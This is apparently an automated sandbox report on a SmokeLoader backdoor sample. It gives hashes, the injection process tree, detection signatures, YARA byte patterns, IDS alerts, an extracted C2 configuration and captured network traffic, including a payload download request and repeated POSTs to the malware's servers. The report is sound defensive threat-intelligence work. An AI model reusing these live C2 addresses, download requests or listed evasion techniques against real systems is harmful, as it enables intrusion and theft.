Edit tour

Windows Analysis Report
file.exe

Overview

General Information

Sample name:	file.exe
Analysis ID:	1532238
MD5:	f0342947877c844a5c82cb4bb5fdadad
SHA1:	c460f35ed9f2b3fd6172f38c70b6073fffe70f17
SHA256:	e93bc7594d1fc8ca1eff0e522b8547e74b3ac33840c55b4f50f69278e4cd8242
Tags:	exeuser-Bitsight
Infos:

Detection

SmokeLoader

Score:	100
Range:	0 - 100
Whitelisted:	false
Confidence:	100%

Signatures

Benign windows process drops PE files

Detected unpacking (changes PE section rights)

Found malware configuration

Malicious sample detected (through community Yara rule)

Multi AV Scanner detection for domain / URL

Multi AV Scanner detection for dropped file

Multi AV Scanner detection for submitted file

Suricata IDS alerts for network traffic

System process connects to network (likely due to code injection or exploit)

Yara detected SmokeLoader

AI detected suspicious sample

C2 URLs / IPs found in malware configuration

Checks for kernel code integrity (NtQuerySystemInformation(CodeIntegrityInformation))

Checks if the current machine is a virtual machine (disk enumeration)

Creates a thread in another existing process (thread injection)

Deletes itself after installation

Hides that the sample has been downloaded from the Internet (zone.identifier)

Machine Learning detection for dropped file

Machine Learning detection for sample

Maps a DLL or memory area into another process

Switches to a custom stack to bypass stack traces

Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)

Abnormal high CPU Usage

Checks if the current process is being debugged

Contains functionality for execution timing, often used to detect debuggers

Contains functionality to call native functions

Contains functionality to read the PEB

Detected potential crypto function

Drops PE files

Drops files with a non-matching file extension (content does not match file extension)

Found a high number of Window / User specific system calls (may be a loop to detect user behavior)

IP address seen in connection with other malware

Internet Provider seen in connection with other malware

JA3 SSL client fingerprint seen in connection with other malware

May sleep (evasive loops) to hinder dynamic analysis

PE file contains sections with non-standard names

Sigma detected: Execution of Suspicious File Type Extension

Uses 32bit PE files

Uses a known web browser user agent for HTTP communication

Uses code obfuscation techniques (call, push, ret)

Yara signature match

Classification

Process Tree

System is w10x64

file.exe (PID: 7400 cmdline: "C:\Users\user\Desktop\file.exe" MD5: F0342947877C844A5C82CB4BB5FDADAD)

explorer.exe (PID: 2580 cmdline: C:\Windows\Explorer.EXE MD5: 662F4F92FDE3557E86D110526BB578D5)

565.exe (PID: 8020 cmdline: C:\Users\user\AppData\Local\Temp\565.exe MD5: F42E9B6758241070E7815B8BD1EB8335)

trbwcit (PID: 7852 cmdline: C:\Users\user\AppData\Roaming\trbwcit MD5: F0342947877C844A5C82CB4BB5FDADAD)

fgbwcit (PID: 6596 cmdline: C:\Users\user\AppData\Roaming\fgbwcit MD5: F42E9B6758241070E7815B8BD1EB8335)

trbwcit (PID: 1432 cmdline: C:\Users\user\AppData\Roaming\trbwcit MD5: F0342947877C844A5C82CB4BB5FDADAD)

fgbwcit (PID: 5356 cmdline: C:\Users\user\AppData\Roaming\fgbwcit MD5: F42E9B6758241070E7815B8BD1EB8335)

cleanup

Malware Threat Intel

Provided by

Name	Description	Attribution	Blogpost URLs	Link
SmokeLoader	The SmokeLoader family is a generic backdoor with a range of capabilities which depend on the modules included in any given build of the malware. The malware is delivered in a variety of ways and is broadly associated with criminal activity. The malware frequently tries to hide its C2 activity by generating requests to legitimate sites such as microsoft.com, bing.com, adobe.com, and others. Typically the actual Download returns an HTTP 404 but still contains data in the Response Body.	SMOKY SPIDER	http://security.neurolabs.club/2019/08/smokeloaders-hardcoded-domains-sneaky.html http://security.neurolabs.club/2019/10/dynamic-imports-and-working-around.html http://security.neurolabs.club/2020/04/diffing-malware-samples-using-bindiff.html http://security.neurolabs.club/2020/06/unpacking-smokeloader-and.html https://0xc0decafe.com/2020/12/23/detect-rc4-in-malicious-binaries	https://malpedia.caad.fkie.fraunhofer.de/details/win.smokeloader

Malware Configuration

Threatname: SmokeLoader

{"Version": 2022, "C2 list": ["https://ninjahallnews.com/search.php", "https://fallhandbat.com/search.php"]}

Yara Signatures

Memory Dumps

Source	Rule	Description	Author	Strings
00000005.00000002.2089545393.0000000002CF1000.00000004.10000000.00040000.00000000.sdmp	JoeSecurity_SmokeLoader_2	Yara detected SmokeLoader	Joe Security
00000005.00000002.2089545393.0000000002CF1000.00000004.10000000.00040000.00000000.sdmp	Windows_Trojan_Smokeloader_4e31426e	unknown	unknown	0x214:$a: 5B 81 EB 34 10 00 00 6A 30 58 64 8B 00 8B 40 0C 8B 40 1C 8B 40 08 89 85 C0
00000008.00000002.2686603157.0000000002C37000.00000040.00000020.00020000.00000000.sdmp	Windows_Trojan_RedLineStealer_ed346e4c	unknown	unknown	0x350e:$a: 55 8B EC 8B 45 14 56 57 8B 7D 08 33 F6 89 47 0C 39 75 10 76 15 8B
00000006.00000002.2387106180.0000000002BF0000.00000040.00001000.00020000.00000000.sdmp	Windows_Trojan_Smokeloader_3687686f	unknown	unknown	0x30d:$a: 0C 8B 45 F0 89 45 C8 8B 45 C8 8B 40 3C 8B 4D F0 8D 44 01 04 89
00000008.00000002.2686820373.0000000002E80000.00000040.00001000.00020000.00000000.sdmp	Windows_Trojan_Smokeloader_3687686f	unknown	unknown	0x30d:$a: 0C 8B 45 F0 89 45 C8 8B 45 C8 8B 40 3C 8B 4D F0 8D 44 01 04 89
00000005.00000002.2089476769.0000000002CC0000.00000040.00001000.00020000.00000000.sdmp	Windows_Trojan_Smokeloader_3687686f	unknown	unknown	0x30d:$a: 0C 8B 45 F0 89 45 C8 8B 45 C8 8B 40 3C 8B 4D F0 8D 44 01 04 89
00000008.00000002.2686854364.0000000002E90000.00000004.00001000.00020000.00000000.sdmp	JoeSecurity_SmokeLoader_2	Yara detected SmokeLoader	Joe Security
00000008.00000002.2686854364.0000000002E90000.00000004.00001000.00020000.00000000.sdmp	Windows_Trojan_Smokeloader_4e31426e	unknown	unknown	0x5e4:$a: 5B 81 EB 34 10 00 00 6A 30 58 64 8B 00 8B 40 0C 8B 40 1C 8B 40 08 89 85 C0
00000005.00000002.2089645639.0000000002D57000.00000040.00000020.00020000.00000000.sdmp	Windows_Trojan_RedLineStealer_ed346e4c	unknown	unknown	0x34e8:$a: 55 8B EC 8B 45 14 56 57 8B 7D 08 33 F6 89 47 0C 39 75 10 76 15 8B
00000006.00000002.2387169374.0000000002C21000.00000004.10000000.00040000.00000000.sdmp	JoeSecurity_SmokeLoader_2	Yara detected SmokeLoader	Joe Security
00000006.00000002.2387169374.0000000002C21000.00000004.10000000.00040000.00000000.sdmp	Windows_Trojan_Smokeloader_4e31426e	unknown	unknown	0x1e4:$a: 5B 81 EB 34 10 00 00 6A 30 58 64 8B 00 8B 40 0C 8B 40 1C 8B 40 08 89 85 C0
00000000.00000002.1818628832.0000000002D90000.00000004.00001000.00020000.00000000.sdmp	JoeSecurity_SmokeLoader_2	Yara detected SmokeLoader	Joe Security
00000000.00000002.1818628832.0000000002D90000.00000004.00001000.00020000.00000000.sdmp	Windows_Trojan_Smokeloader_4e31426e	unknown	unknown	0x614:$a: 5B 81 EB 34 10 00 00 6A 30 58 64 8B 00 8B 40 0C 8B 40 1C 8B 40 08 89 85 C0
00000000.00000002.1818742060.0000000002DB7000.00000040.00000020.00020000.00000000.sdmp	Windows_Trojan_RedLineStealer_ed346e4c	unknown	unknown	0x3e00:$a: 55 8B EC 8B 45 14 56 57 8B 7D 08 33 F6 89 47 0C 39 75 10 76 15 8B
00000006.00000002.2387276728.0000000002C67000.00000040.00000020.00020000.00000000.sdmp	Windows_Trojan_RedLineStealer_ed346e4c	unknown	unknown	0x373e:$a: 55 8B EC 8B 45 14 56 57 8B 7D 08 33 F6 89 47 0C 39 75 10 76 15 8B
00000000.00000002.1818859603.0000000002EF1000.00000004.10000000.00040000.00000000.sdmp	JoeSecurity_SmokeLoader_2	Yara detected SmokeLoader	Joe Security
00000000.00000002.1818859603.0000000002EF1000.00000004.10000000.00040000.00000000.sdmp	Windows_Trojan_Smokeloader_4e31426e	unknown	unknown	0x214:$a: 5B 81 EB 34 10 00 00 6A 30 58 64 8B 00 8B 40 0C 8B 40 1C 8B 40 08 89 85 C0
00000008.00000002.2687018881.0000000003001000.00000004.10000000.00040000.00000000.sdmp	JoeSecurity_SmokeLoader_2	Yara detected SmokeLoader	Joe Security
00000008.00000002.2687018881.0000000003001000.00000004.10000000.00040000.00000000.sdmp	Windows_Trojan_Smokeloader_4e31426e	unknown	unknown	0x1e4:$a: 5B 81 EB 34 10 00 00 6A 30 58 64 8B 00 8B 40 0C 8B 40 1C 8B 40 08 89 85 C0
00000000.00000002.1818600751.0000000002D80000.00000040.00001000.00020000.00000000.sdmp	Windows_Trojan_Smokeloader_3687686f	unknown	unknown	0x30d:$a: 0C 8B 45 F0 89 45 C8 8B 45 C8 8B 40 3C 8B 4D F0 8D 44 01 04 89
00000006.00000002.2387127676.0000000002C00000.00000004.00001000.00020000.00000000.sdmp	JoeSecurity_SmokeLoader_2	Yara detected SmokeLoader	Joe Security
00000006.00000002.2387127676.0000000002C00000.00000004.00001000.00020000.00000000.sdmp	Windows_Trojan_Smokeloader_4e31426e	unknown	unknown	0x5e4:$a: 5B 81 EB 34 10 00 00 6A 30 58 64 8B 00 8B 40 0C 8B 40 1C 8B 40 08 89 85 C0
00000005.00000002.2089499262.0000000002CD0000.00000004.00001000.00020000.00000000.sdmp	JoeSecurity_SmokeLoader_2	Yara detected SmokeLoader	Joe Security
00000005.00000002.2089499262.0000000002CD0000.00000004.00001000.00020000.00000000.sdmp	Windows_Trojan_Smokeloader_4e31426e	unknown	unknown	0x614:$a: 5B 81 EB 34 10 00 00 6A 30 58 64 8B 00 8B 40 0C 8B 40 1C 8B 40 08 89 85 C0
Click to see the 19 entries

Sigma Signatures

System Summary

Sigma detected: Execution of Suspicious File Type Extension

Source: Process started

Author: Max Altgelt (Nextron Systems): Data: Command: C:\Users\user\AppData\Roaming\trbwcit, CommandLine: C:\Users\user\AppData\Roaming\trbwcit, CommandLine|base64offset|contains: , Image: C:\Users\user\AppData\Roaming\trbwcit, NewProcessName: C:\Users\user\AppData\Roaming\trbwcit, OriginalFileName: C:\Users\user\AppData\Roaming\trbwcit, ParentCommandLine: , ParentImage: , ParentProcessId: 1044, ProcessCommandLine: C:\Users\user\AppData\Roaming\trbwcit, ProcessId: 7852, ProcessName: trbwcit

Suricata Signatures

ET MALWARE Suspected Smokeloader Activity (POST)

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-10-12T22:28:34.855747+0200	2039103	1	A Network Trojan was detected	192.168.2.4	49738	190.147.128.172	80	TCP
2024-10-12T22:28:36.179777+0200	2039103	1	A Network Trojan was detected	192.168.2.4	49739	190.147.128.172	80	TCP
2024-10-12T22:28:37.301512+0200	2039103	1	A Network Trojan was detected	192.168.2.4	49740	190.147.128.172	80	TCP
2024-10-12T22:28:38.679060+0200	2039103	1	A Network Trojan was detected	192.168.2.4	49741	190.147.128.172	80	TCP
2024-10-12T22:28:39.768855+0200	2039103	1	A Network Trojan was detected	192.168.2.4	49742	190.147.128.172	80	TCP
2024-10-12T22:28:40.836305+0200	2039103	1	A Network Trojan was detected	192.168.2.4	49743	190.147.128.172	80	TCP
2024-10-12T22:28:42.152277+0200	2039103	1	A Network Trojan was detected	192.168.2.4	49744	190.147.128.172	80	TCP
2024-10-12T22:28:43.239304+0200	2039103	1	A Network Trojan was detected	192.168.2.4	49745	190.147.128.172	80	TCP
2024-10-12T22:28:44.333751+0200	2039103	1	A Network Trojan was detected	192.168.2.4	49746	190.147.128.172	80	TCP
2024-10-12T22:28:45.434201+0200	2039103	1	A Network Trojan was detected	192.168.2.4	49747	190.147.128.172	80	TCP
2024-10-12T22:28:46.545952+0200	2039103	1	A Network Trojan was detected	192.168.2.4	49748	190.147.128.172	80	TCP
2024-10-12T22:28:47.805965+0200	2039103	1	A Network Trojan was detected	192.168.2.4	49749	190.147.128.172	80	TCP
2024-10-12T22:28:48.888009+0200	2039103	1	A Network Trojan was detected	192.168.2.4	49750	190.147.128.172	80	TCP
2024-10-12T22:28:49.963152+0200	2039103	1	A Network Trojan was detected	192.168.2.4	49751	190.147.128.172	80	TCP
2024-10-12T22:28:51.038576+0200	2039103	1	A Network Trojan was detected	192.168.2.4	49752	190.147.128.172	80	TCP
2024-10-12T22:28:52.162158+0200	2039103	1	A Network Trojan was detected	192.168.2.4	49753	190.147.128.172	80	TCP
2024-10-12T22:28:53.210807+0200	2039103	1	A Network Trojan was detected	192.168.2.4	49754	190.147.128.172	80	TCP
2024-10-12T22:28:54.287233+0200	2039103	1	A Network Trojan was detected	192.168.2.4	49755	190.147.128.172	80	TCP
2024-10-12T22:28:55.393275+0200	2039103	1	A Network Trojan was detected	192.168.2.4	49756	190.147.128.172	80	TCP
2024-10-12T22:28:56.468350+0200	2039103	1	A Network Trojan was detected	192.168.2.4	49757	190.147.128.172	80	TCP
2024-10-12T22:28:57.586832+0200	2039103	1	A Network Trojan was detected	192.168.2.4	49758	190.147.128.172	80	TCP
2024-10-12T22:28:58.647677+0200	2039103	1	A Network Trojan was detected	192.168.2.4	49760	190.147.128.172	80	TCP
2024-10-12T22:28:59.810217+0200	2039103	1	A Network Trojan was detected	192.168.2.4	49767	190.147.128.172	80	TCP
2024-10-12T22:29:00.890699+0200	2039103	1	A Network Trojan was detected	192.168.2.4	49773	190.147.128.172	80	TCP
2024-10-12T22:29:03.439980+0200	2039103	1	A Network Trojan was detected	192.168.2.4	49790	190.147.128.172	80	TCP
2024-10-12T22:29:04.556178+0200	2039103	1	A Network Trojan was detected	192.168.2.4	49796	190.147.128.172	80	TCP
2024-10-12T22:29:06.138823+0200	2039103	1	A Network Trojan was detected	192.168.2.4	49802	190.147.128.172	80	TCP
2024-10-12T22:29:07.242035+0200	2039103	1	A Network Trojan was detected	192.168.2.4	49808	190.147.128.172	80	TCP
2024-10-12T22:29:08.323623+0200	2039103	1	A Network Trojan was detected	192.168.2.4	49819	190.147.128.172	80	TCP
2024-10-12T22:29:09.405245+0200	2039103	1	A Network Trojan was detected	192.168.2.4	49825	190.147.128.172	80	TCP
2024-10-12T22:29:10.496935+0200	2039103	1	A Network Trojan was detected	192.168.2.4	49832	190.147.128.172	80	TCP
2024-10-12T22:29:11.577113+0200	2039103	1	A Network Trojan was detected	192.168.2.4	49841	190.147.128.172	80	TCP
2024-10-12T22:29:12.665671+0200	2039103	1	A Network Trojan was detected	192.168.2.4	49847	190.147.128.172	80	TCP
2024-10-12T22:29:13.773014+0200	2039103	1	A Network Trojan was detected	192.168.2.4	49853	190.147.128.172	80	TCP
2024-10-12T22:29:15.061716+0200	2039103	1	A Network Trojan was detected	192.168.2.4	49859	190.147.128.172	80	TCP
2024-10-12T22:29:16.143581+0200	2039103	1	A Network Trojan was detected	192.168.2.4	49870	190.147.128.172	80	TCP
2024-10-12T22:30:26.260553+0200	2039103	1	A Network Trojan was detected	192.168.2.4	50043	190.147.128.172	80	TCP
2024-10-12T22:30:33.005730+0200	2039103	1	A Network Trojan was detected	192.168.2.4	50044	190.147.128.172	80	TCP
2024-10-12T22:30:42.007630+0200	2039103	1	A Network Trojan was detected	192.168.2.4	50045	190.147.128.172	80	TCP
2024-10-12T22:30:52.824767+0200	2039103	1	A Network Trojan was detected	192.168.2.4	50046	190.147.128.172	80	TCP
2024-10-12T22:31:06.258519+0200	2039103	1	A Network Trojan was detected	192.168.2.4	50047	175.119.10.231	80	TCP
2024-10-12T22:31:20.968526+0200	2039103	1	A Network Trojan was detected	192.168.2.4	50048	175.119.10.231	80	TCP
2024-10-12T22:31:36.114550+0200	2039103	1	A Network Trojan was detected	192.168.2.4	50049	175.119.10.231	80	TCP
2024-10-12T22:31:50.445964+0200	2039103	1	A Network Trojan was detected	192.168.2.4	50050	175.119.10.231	80	TCP
2024-10-12T22:32:05.414626+0200	2039103	1	A Network Trojan was detected	192.168.2.4	50051	175.119.10.231	80	TCP

Joe Sandbox Signatures

Click to jump to signature section

Show All Signature Results

AV Detection

Found malware configuration

Source: 00000008.00000002.2686854364.0000000002E90000.00000004.00001000.00020000.00000000.sdmp

Malware Configuration Extractor: SmokeLoader {"Version": 2022, "C2 list": ["https://ninjahallnews.com/search.php", "https://fallhandbat.com/search.php"]}

Multi AV Scanner detection for domain / URL

Source: nwgrus.ru

Virustotal: Detection: 12%

Perma Link

Multi AV Scanner detection for dropped file

Source: C:\Users\user\AppData\Roaming\trbwcit

ReversingLabs: Detection: 36%

Multi AV Scanner detection for submitted file

Source: file.exe	ReversingLabs: Detection: 36%
Source: file.exe	Virustotal: Detection: 39%			Perma Link

AI detected suspicious sample

Source: Submited Sample

Integrated Neural Analysis Model: Matched 100.0% probability

Machine Learning detection for dropped file

Source: C:\Users\user\AppData\Roaming\fgbwcit	Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Roaming\trbwcit	Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Temp\565.exe	Joe Sandbox ML: detected

Machine Learning detection for sample

Source: file.exe

Joe Sandbox ML: detected

Source: file.exe

Static PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, 32BIT_MACHINE

Source: C:\Users\user\Desktop\file.exe

File opened: C:\Windows\SysWOW64\msvcr100.dll

Jump to behavior

Source: unknown

HTTPS traffic detected: 23.145.40.164:443 -> 192.168.2.4:49779 version: TLS 1.2

Networking

Suricata IDS alerts for network traffic

Source: Network traffic	Suricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.2.4:49756 -> 190.147.128.172:80
Source: Network traffic	Suricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.2.4:49750 -> 190.147.128.172:80
Source: Network traffic	Suricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.2.4:49757 -> 190.147.128.172:80
Source: Network traffic	Suricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.2.4:49753 -> 190.147.128.172:80
Source: Network traffic	Suricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.2.4:49741 -> 190.147.128.172:80
Source: Network traffic	Suricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.2.4:49746 -> 190.147.128.172:80
Source: Network traffic	Suricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.2.4:49773 -> 190.147.128.172:80
Source: Network traffic	Suricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.2.4:49738 -> 190.147.128.172:80
Source: Network traffic	Suricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.2.4:49767 -> 190.147.128.172:80
Source: Network traffic	Suricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.2.4:49739 -> 190.147.128.172:80
Source: Network traffic	Suricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.2.4:49755 -> 190.147.128.172:80
Source: Network traffic	Suricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.2.4:49743 -> 190.147.128.172:80
Source: Network traffic	Suricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.2.4:49742 -> 190.147.128.172:80
Source: Network traffic	Suricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.2.4:49740 -> 190.147.128.172:80
Source: Network traffic	Suricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.2.4:49745 -> 190.147.128.172:80
Source: Network traffic	Suricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.2.4:49752 -> 190.147.128.172:80
Source: Network traffic	Suricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.2.4:49747 -> 190.147.128.172:80
Source: Network traffic	Suricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.2.4:49760 -> 190.147.128.172:80
Source: Network traffic	Suricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.2.4:49751 -> 190.147.128.172:80
Source: Network traffic	Suricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.2.4:49754 -> 190.147.128.172:80
Source: Network traffic	Suricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.2.4:49758 -> 190.147.128.172:80
Source: Network traffic	Suricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.2.4:49802 -> 190.147.128.172:80
Source: Network traffic	Suricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.2.4:49825 -> 190.147.128.172:80
Source: Network traffic	Suricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.2.4:49790 -> 190.147.128.172:80
Source: Network traffic	Suricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.2.4:49744 -> 190.147.128.172:80
Source: Network traffic	Suricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.2.4:49853 -> 190.147.128.172:80
Source: Network traffic	Suricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.2.4:49808 -> 190.147.128.172:80
Source: Network traffic	Suricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.2.4:49870 -> 190.147.128.172:80
Source: Network traffic	Suricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.2.4:49748 -> 190.147.128.172:80
Source: Network traffic	Suricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.2.4:49819 -> 190.147.128.172:80
Source: Network traffic	Suricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.2.4:49749 -> 190.147.128.172:80
Source: Network traffic	Suricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.2.4:49796 -> 190.147.128.172:80
Source: Network traffic	Suricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.2.4:49847 -> 190.147.128.172:80
Source: Network traffic	Suricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.2.4:49841 -> 190.147.128.172:80
Source: Network traffic	Suricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.2.4:50044 -> 190.147.128.172:80
Source: Network traffic	Suricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.2.4:50046 -> 190.147.128.172:80
Source: Network traffic	Suricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.2.4:50043 -> 190.147.128.172:80
Source: Network traffic	Suricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.2.4:50049 -> 175.119.10.231:80
Source: Network traffic	Suricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.2.4:50050 -> 175.119.10.231:80
Source: Network traffic	Suricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.2.4:49832 -> 190.147.128.172:80
Source: Network traffic	Suricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.2.4:50048 -> 175.119.10.231:80
Source: Network traffic	Suricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.2.4:50047 -> 175.119.10.231:80
Source: Network traffic	Suricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.2.4:50045 -> 190.147.128.172:80
Source: Network traffic	Suricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.2.4:49859 -> 190.147.128.172:80
Source: Network traffic	Suricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.2.4:50051 -> 175.119.10.231:80

System process connects to network (likely due to code injection or exploit)

Source: C:\Windows\explorer.exe	Network Connect: 175.119.10.231 80	Jump to behavior
Source: C:\Windows\explorer.exe	Network Connect: 190.147.128.172 80	Jump to behavior
Source: C:\Windows\explorer.exe	Network Connect: 23.145.40.164 443	Jump to behavior

C2 URLs / IPs found in malware configuration

Source: Malware configuration extractor	URLs: https://ninjahallnews.com/search.php
Source: Malware configuration extractor	URLs: https://fallhandbat.com/search.php

Source: Joe Sandbox View	IP Address: 23.145.40.164 23.145.40.164
Source: Joe Sandbox View	IP Address: 175.119.10.231 175.119.10.231

Source: Joe Sandbox View	ASN Name: TelmexColombiaSACO TelmexColombiaSACO
Source: Joe Sandbox View	ASN Name: SURFAIRWIRELESS-IN-01US SURFAIRWIRELESS-IN-01US
Source: Joe Sandbox View	ASN Name: SKB-ASSKBroadbandCoLtdKR SKB-ASSKBroadbandCoLtdKR

Source: Joe Sandbox View

JA3 fingerprint: 72a589da586844d7f0818ce684948eea

Source: global traffic	HTTP traffic detected: GET /ksa9104.exe HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoHost: 23.145.40.164
Source: global traffic	HTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: /Referer: http://mbokbuwfpvoxbkg.com/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 287Host: nwgrus.ru
Source: global traffic	HTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: /Referer: http://pixlrdkntmlnb.com/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 148Host: nwgrus.ru
Source: global traffic	HTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: /Referer: http://bycmgoqasptpbarq.net/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 238Host: nwgrus.ru
Source: global traffic	HTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: /Referer: http://mkmjhgiqxobee.com/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 173Host: nwgrus.ru
Source: global traffic	HTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: /Referer: http://guwkkhaqmlu.org/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 128Host: nwgrus.ru
Source: global traffic	HTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: /Referer: http://ipxaqeyacookwjhd.net/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 250Host: nwgrus.ru
Source: global traffic	HTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: /Referer: http://fjjppebnfln.com/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 285Host: nwgrus.ru
Source: global traffic	HTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: /Referer: http://giecrmryibj.com/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 262Host: nwgrus.ru
Source: global traffic	HTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: /Referer: http://ftxsovsyqtpojv.com/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 246Host: nwgrus.ru
Source: global traffic	HTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: /Referer: http://bdnqdofcypmiflj.com/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 322Host: nwgrus.ru
Source: global traffic	HTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: /Referer: http://sfxppmjegqvmfflo.net/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 218Host: nwgrus.ru
Source: global traffic	HTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: /Referer: http://bdvavhcwwpnmuonq.com/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 287Host: nwgrus.ru
